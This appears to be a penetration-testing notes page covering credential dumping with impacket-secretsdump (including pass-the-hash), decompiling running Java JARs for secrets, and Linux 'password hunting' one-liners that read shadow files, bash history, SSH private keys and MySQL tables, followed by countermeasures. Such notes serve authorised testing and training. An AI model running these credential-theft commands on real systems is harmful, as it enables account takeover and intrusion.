[Active Directory] Dumping credentials with impacket-secretsdump

Impacket SecretsDump is a powerful tool used in penetration testing and ethical hacking for extracting plaintext credentials and other sensitive information from Windows systems. Developed in Python, Impacket is an open-source collection of Python classes for working with network protocols. SecretsDump, a part of the Impacket suite, focuses specifically on extracting credentials and secrets from Windows machines.

Hive Details Format or credential material
SAM stores locally cached credentials (referred to as SAM secrets) LM or NT hashes
SECURITY stores domain cached credentials (referred to as LSA secrets) Plaintext passwords

LM or NT hashes

Kerberos keys (DES, AES)

Domain Cached Credentials (DCC1 and DCC2)

Security Questions (L$SQSA<SID>)

SYSTEM contains enough info to decrypt SAM secrets and LSA secrets N/A

Capabilities:

  • Credential Extraction
  • Kerberos Ticket Extraction
  • NTLM Hash Dumping
  • Local and Remote Operations
  • Pass-the-Ticket (PTT) Attack

How to use

1. Display the tool help

  • impacket-secretsdump -h

2. Remote dumping of SAM & LSA secrets

  • impacket-secretsdump lab.local/vry4n:IamAdmin123@192.168.0.101

3. dump the NTLM from DC, Active directory users

  • impacket-secretsdump lab.local/vry4n:IamAdmin123@192.168.0.100 -just-dc-ntlm

4. Remote dumping of SAM & LSA secrets (pass-the-hash)

  • secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
  • impacket-secretsdump lab.local/administrator@192.168.0.100 -hashes aad3b435b51404eeaad3b435b51404ee:702262e2d64f9c0df2bec8ca45ff2985

5. Remote dumping of SAM & LSA secrets (pass-the-ticket)

  • secretsdump.py -k 'DOMAIN/USER@TARGET'

6. Offline dumping of LSA secrets from exported hives

  • secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL

7. Offline dumping of SAM secrets from exported hives

  • secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL

8. Offline dumping of SAM & LSA secrets from exported hives

  • secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL

[Privilege Escalation] Java Jar file enumeration/Code Review

.jar file enumeration from processes in Linux involves identifying and extracting information about Java Archive (JAR) files that are currently running within a system's processes. This process can be useful for various purposes, such as troubleshooting, security analysis, or understanding the dependencies of a running Java application.

Enumeration

1. Use tools like ps or pgrep to identify running Java processes. You can filter processes based on the Java executable or any related parameters.

  • ps aux | grep -i java

2. Once you identify the Java processes, extract more detailed information using tools like jcmd or jps (Java Process Status). For instance:

  • jcmd <PID> help
  • jcmd <PID> VM.system_properties

Note: files associated with the Java processes. This information can be extracted from the output of the previously used tools.

3. The lsof command can be helpful in listing open files, including JAR files opened by Java processes:

  • lsof -p <process-id> | grep ".jar"

4. The /proc filesystem in Linux provides a wealth of information about processes. You can navigate to /proc/<process-id>/ and examine files like cmdline, which contains the command-line arguments, and maps, which displays memory maps, potentially revealing loaded JAR files.

  • ls -l /proc/<process-id>/cwd
  • cat /proc/<process-id>/cmdline

5. Extract strings from the process memory to identify potential JAR file references:

  • strings /proc/<process-id>/mem | grep ".jar"

6. Java applications may log information about loaded JAR files. Check the application logs for any relevant details

Exploitation

1. Once you locate the jar file you can transfer it to your computer and examine the code using jd-gui

2. Click open file, locate the .jar, open it

3. Expand the tabs analyze the code and try to find flaws or any confidential data such as usernames & passwords

Note: In this case we found POSTGRESQL database username and password

[Credential Hunting] Extracting Credentials from Configuration Files

Configuration files play a critical role in storing sensitive credentials for various applications and services. Attackers often target these files to extract valuable information, such as usernames, passwords, API keys, and database credentials. Understanding the techniques employed by adversaries is vital in implementing effective defensive measures.

Techniques for Extracting Credentials

Attackers utilize multiple methods to extract credentials from configuration files. The following techniques are commonly observed in credential extraction attacks:

  • File Parsing: Attackers parse configuration files, leveraging knowledge of file formats and patterns to identify and extract credentials.
  • Regular Expressions: Utilizing pattern matching techniques, attackers search for credential-like strings within configuration files.
  • File Inclusion Vulnerabilities: Exploiting vulnerabilities that allow them to read or include arbitrary files, attackers gain access to configuration files containing credentials.
  • Data Leakage: Identifying misconfigurations or insecure logging practices, attackers exploit logs or error messages that inadvertently reveal credentials.

Common Configuration Files Containing Credentials

Certain configuration files frequently store credentials, making them attractive targets for attackers. Examples of commonly targeted files include:

  • Web Application Configurations: Files like web.config (ASP.NET), .env (PHP), or application.properties (Java) may contain database credentials or API keys.
  • Database Configuration Files: Configuration files like my.cnf (MySQL) or pg_hba.conf (PostgreSQL) often store database access credentials.
  • Network Service Configurations: SSH server configurations (sshd_config), mail server configurations (smtpd.conf), or VPN configurations (openvpn.conf) may contain critical credentials.
  • Binary Analysis: Attackers analyze binary files associated with applications to extract credentials embedded within them.
  • Memory Scraping: Attackers target running processes or system memory to retrieve credentials stored temporarily during application runtime.
  • Configuration File Misplacement: Attackers exploit misconfigurations that result in configuration files being inadvertently placed in publicly accessible locations.
  • Server Misconfigurations: Attackers leverage misconfigurations in web servers, FTP servers, or other services to gain unauthorized access to configuration files and extract credentials.

Example: Config files

1. In this case we have an application installed, which is connected to a database, looking into the configuration files we found config.json, which contains a username and password. The first step is to identify the home folder for the application

  • whereis mattermost

2. Knowing this help us find files using different techniques

  • ls -lR | grep -i conf
  • find /opt/mattermost -type f -iname "*config*" -o -iname "*conf*" 2> /dev/null
  • find /opt/mattermost -type f -exec grep -liE 'username|password|user|pass' {} +

3. Searching though the output we found config.json, reading this file we can find

  • cat /opt/mattermost/config/config.json | grep -iE "user|username|pass|password"

4. Knowing, this configuration file could contain additional information, we proceed to read it

  • cat /opt/mattermost/config/config.json | less

Note: we also found something that seems SQL username and password

5. We will try access this database

  • mysql -u mmuser -p
  • Password: Crack_The_MM_Admin_PW
  • show databases;

Techniques

Password Hunting – Filenames and File Contents

When it comes to password hunting, one of the first things we should do is perform a high-level search to look for files that contain “password” in the filename. In addition to filenames, we should also be looking for the string “password” inside files.

Hunting for Interesting Filenames

1. We should start by looking for filenames that contain the word “password” in them before looking for the string “password” inside files on the filesystem. Additionally, we should also be looking for filenames that contain any other interesting strings that we can think of (config, php, etc.)

  • find / -exec ls -lad $PWD/* "{}" 2>/dev/null \; | grep -i -I "passw\|pwd"
  • find . -type f -exec grep -i -I “PASSWORD\|PASSWD” {} /dev/null \;
  • cat /var/mail/*; cat var/spol/mail
  • crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron; cat /etc/cron; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny; cat /etc/crontab; cat /etc/anacrontab; cat /var/spool/cron/crontabs/root
  • find /home/* -type f -name "*.txt" -o ! -name "*.*"

2. Another command that we can use to comb the entire filesystem for files that contain a certain string in their name is the locate command.

  • locate 'passw'
  • locate 'pwd'
  • locate '*.php'
  • locate config.php
  • locate password; locate passwd
  • locate config.

Hunting for Interesting Strings Inside Files

1. There is a nice utilization of the grep command that we can use to search for files that contain the string “passw” and “pwd” across the entire filesystem; however, it does produce a RIDICULOUS amount of results.

  • grep --color=auto -rnw '/' -iIe "PASS\|PASSW\|PASSWD\|PASSWORD\|PWD" --color=always 2>/dev/null
  • grep –color=auto -rnw ‘/’ -ie “PASSWORD\|PASSWD” –color=always 2> /dev/null

2. we can navigate to common folders where we normally find interesting files, such as /var/www, /tmp, /opt, /home, etc. and then execute the following command:

  • grep --color=auto -rnw -iIe "PASSW\|PASSWD\|PASSWORD\|PWD" --color=always 2>/dev/null

Check for Hashes Stored in Passwd/Shadow

  • find / -name passwd -xdev 2>/dev/null; find / -name shadow -xdev 2>/dev/null
  • cat /etc/passwd; cat /etc/shadow

Old passwords in /etc/security/opasswd

The /etc/security/opasswd file is used by pam_cracklib (a module used in Linux to ensure a good password policy is in place) to store the hashed version of old passwords used on the system to prevent users from reusing the same ones over and over again.

  • cat /etc/security/opasswd
  • find / -name opasswd -xdev 2>/dev/null

Recently Modified Files

It can be useful to check files that were modified recently, as they may be containing useful information and/or credentials.

  • find / -mmin -30 -xdev 2>/dev/null

Credentials Stored in Memory

Services will sometimes store the credentials entered by the end user in clear text in memory. The commands below can help find credentials stored in processes:

  • strings /dev/mem -n10 | grep -ie “PASSWORD|PASSWD” –color=always

Password Hunting – Hidden Files and Folders

1. On *nix systems, hidden files and folders will start with a period like the .bash_history file or the .ssh folder. To look for hidden files or folders, we can use the ‘-a’ switch when using the ls command, like so:

  • ls -la
  • ls -la /

Passwords in Bash History Files

1. The .bash_history file is a file that stores a history of user commands entered at the command prompt; used for viewing old commands that have been executed. The user’s current session saves the command history into memory, which can be viewed with the history command. But once that user logs off, the commands stored in memory are saved to the .bash_history file.

  • find / -name *_history -xdev 2> /dev/null
  • cat /home/user/.bash_history

Passwords in SSH Keys

1. When we are enumerating the different user profiles, we may come across a hidden folder that contains SSH keys! – This is commonly named .ssh and can be found using ls-la. we find there is an .ssh directory and inside an id_rsa file that we have read permissions on!

The id_rsa file is a private key that can be used to login to SSH without knowing the users password, but only if no password was set when the key was created. This file is essentially the equivalent of a password, with regards to getting you into the system.

  • cd /home/usr/.ssh/id_rsa
  • cat id_rsa

2. Uses Linux-based command grep to search the file system for key terms `PRIVATE KEY` to discover SSH keys.

  • grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

3. Uses Linux-based grep command to search for the keywords `PRIVATE KEY` within files contained in a user's home directory.

  • grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"

4. Uses Linux-based grep command to search for keywords `ssh-rsa` within files contained in a user's home directory.

  • grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

Password Hunting – MySQL

1. Let’s jump into MySQL and enumerate the databases and tables. If we get lucky, we may find usernames and passwords for web applications as well as MySQL itself.

  • mysql -u root -p
  • show databases;
  • use <DB name>;
  • show tables;
  • select * from user;

Apart from the default databases, we should ALWAYS be interested in custom ones. Especially when the custom DB is related to a web application. If we find some password hashes in here, we may be able to crack them and use them to increase our access.

Password Hunting – /var/backups Folder

The /var/backups folder is where some automatic backups are stored, such as a backup of both the passwd and shadow file. However, the default backup files will have a restricted set of permissions just like the actual files do.

Essentially, we are looking for one of two scenarios…

  • The files in the backup folder have weak permissions allowing us to read files we should not be able to.
  • There are custom files in the folder that we can read.

Hunting with LinPEAS

For interesting strings in file names, LinPEAS only has the following sub-section: Searching *password* or *credential* files in home (limit 70). Although it says “in home”, it actually checks the entire filesystem. Unfortunately, the limit of 70 helps reduce output, but it also leaves out a lot of potential findings.

The strings inside files is also very targeted, for example it searches for passwords in log files, config PHP files, as well as only a few others.

For the rest of the LinPEAS example, we will look at how many of the same files it was able to find that we also found.

  • Config.php? – Found! – Finds the file and extracts the contents of the password.

  • passwd.dav? – NOT Found!
  • Hidden folder and file: /.important/.password? – Found! – Finds the files but does NOT extract the contents for us.

  • .bash_history files? – Found! – Finds which ones are readable by the current user, but does NOT extract the contents for us.
  • .ssh folder and SSH keys? – Found! – Finds which ones are readable by the current user, but does NOT extract the contents for us.

  • Hashes in MySQL? – NOT Found! – LinPEAS does not have the ability to access the database if there is a password set on the root MySQL user account.
  • pwds.db? – Found! – LinPEAS searches for interesting DB files and extracts the contents. Here we can see that it only dumps one hash in the file, but its enough to let us know we can go and explore it further manually.

  • backup.rar?– Found! – LinPEAS extracts all files from /opt and also has a check to find backup files.

Scripts

1. Script that can be used to find .conf, .config and .cnf files on a Linux system.

  • for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib|fonts|share|core" ;done

2. Script that can be used to find credentials in specified file types.

  • for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc|lib");do echo -e "\nFile: " $i; grep "user|password|pass" $i 2>/dev/null | grep -v "\#";done

3. Script that can be used to find common database files.

  • for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share|man";done

4. Script that can be used to search for common file types used with scripts.

  • for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share";done

5. Script used to look for common types of documents.

  • for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib|fonts|share|core" ;done

Some interesting keywords

Passphrase

Codephrase

Passcode

Keyphrase

Secret

Secure

Access

Secure passcode

Authentication

Auth

Token

Verification

Identity

Access

Security

Private

Secret

Cryptographic

Keyfile

Private code

Cipher

Secret

Passkey

Access

Key

password

Unlock

Security

Code

Secret

Security

Passcode

Cipher

Key

Cryptographic

Crypto

Encryption

Key pair

Decryption

Authentication

Credential

Auth

Credential

Identity code

Access

Countermeasures: Protecting Credentials in Configuration Files

To mitigate the risk of credential extraction from configuration files, the following countermeasures should be implemented:

  • Encryption and Hashing: Encrypt or hash sensitive credentials within configuration files to make them unusable if obtained by attackers.
  • Secure File Permissions: Set appropriate file permissions to limit access to configuration files, ensuring that only authorized users can read or modify them.
  • Environment Variables: Store credentials as environment variables instead of hardcoding them in configuration files.
  • Credential Management Systems: Implement secure credential management systems that centralize and protect sensitive credentials.
  • Regular Auditing: Conduct regular audits to identify insecure configurations and ensure proper protection of credentials.
  • Secure Development Practices: Train developers on secure coding practices, emphasizing the importance of properly handling credentials in configuration files.

Monitoring and Intrusion Detection

Implementing robust monitoring and intrusion detection mechanisms can help identify unauthorized access or suspicious activities related to configuration files. Key monitoring measures include:

  • Log Monitoring: Regularly analyze logs for unusual activity, such as unexpected modifications or access to configuration files.
  • Intrusion Detection Systems (IDS): Deploy IDS solutions to detect anomalous patterns or known attack signatures targeting configuration files.
  • Endpoint Security: Employ endpoint security solutions that detect and prevent unauthorized access to configuration files.

References

https://juggernaut-sec.com/password-hunting-lpe/

https://steflan-security.com/linux-privilege-escalation-credentials-harvesting/

https://atom.hackstreetboys.ph/linux-privilege-escalation-password-and-keys/

https://pentest.coffee/local-password-attack-and-credentials-theft-for-windows-linux-5764a1a25363